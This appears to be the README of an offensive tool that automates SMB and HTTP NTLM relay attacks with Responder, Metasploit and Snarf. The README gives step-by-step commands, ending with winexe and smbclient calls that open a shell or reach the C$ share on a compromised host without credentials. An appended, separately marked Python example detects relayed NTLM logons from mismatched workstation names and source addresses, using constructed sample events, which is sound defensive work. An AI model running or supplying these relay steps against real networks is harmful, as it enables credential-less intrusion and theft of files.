Automatically performs the SMB relay attack. Uses Responder to poison, Metasploit for HTTP NTLM relay (rather than just SMB relay), and Snarf for the MITM'ing.
-
pip install -r requirements
-
python autoresp.py -i [interface] -x [nmap xml file]
-
Point your browser to http://localhost:4001 and refresh it periodically to see your MITM'd connections.
-
After a connection has expired (or you expire it), click "choose".
-
Run: winexe //127.0.0.1 -U "a%a" cmd.exe
-
If your SMB connection had admin rights, you now have a shell without any credentials.
-
Failing that, try: smbclient -U a%a //127.0.0.1/C$ and you should now be able to upload and download files from the compromised system.
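Detection side of the relay described above, as an added example that is not part of this project's code: a relayed session reaches the target from the relay host, so the target records an NTLM network logon whose workstation name belongs to one machine and whose source address belongs to another. The CSV layout, the inventory mapping and all sample rows are constructed assumptions; the column names follow the Windows Security event 4624 fields.

```python
# Added example: flag NTLM network logons (event 4624, LogonType 3) where the
# claimed WorkstationName does not match the source IpAddress.
import csv
import io

# Constructed inventory: hostname -> expected IP (assumed to come from DHCP/DNS/CMDB).
INVENTORY = {"WS-ALICE": "10.0.0.21", "WS-BOB": "10.0.0.22", "FS01": "10.0.0.5"}

# Constructed sample of 4624 events exported to CSV from a file server.
SAMPLE_EVENTS = """EventID,LogonType,AuthenticationPackageName,TargetUserName,WorkstationName,IpAddress
4624,3,NTLM,alice,WS-ALICE,10.0.0.21
4624,3,NTLM,bob,WS-BOB,10.0.0.66
4624,3,Kerberos,alice,-,10.0.0.21
4624,2,Negotiate,carol,FS01,127.0.0.1
4624,3,NTLM,dave,WS-UNKNOWN,10.0.0.70
"""

def find_relay_candidates(csv_text, inventory):
    """Return (user, workstation, source_ip, reason) tuples worth reviewing."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        # Only successful network logons authenticated with NTLM are relevant.
        if row["EventID"] != "4624" or row["LogonType"] != "3":
            continue
        if row["AuthenticationPackageName"].upper() != "NTLM":
            continue
        host = row["WorkstationName"].strip().upper()
        src = row["IpAddress"].strip()
        expected = inventory.get(host)
        if expected is None:
            reason = "workstation not in inventory"
        elif expected != src:
            reason = f"expected {expected}"
        else:
            continue  # name and address agree: ordinary NTLM logon
        findings.append((row["TargetUserName"], host, src, reason))
    return findings

if __name__ == "__main__":
    for user, host, src, reason in find_relay_candidates(SAMPLE_EVENTS, INVENTORY):
        print(f"REVIEW user={user} workstation={host} source={src} ({reason})")
```

Hosts behind NAT, VPN concentrators or with stale inventory entries will also show up here, so treat a hit as a lead to review rather than a verdict.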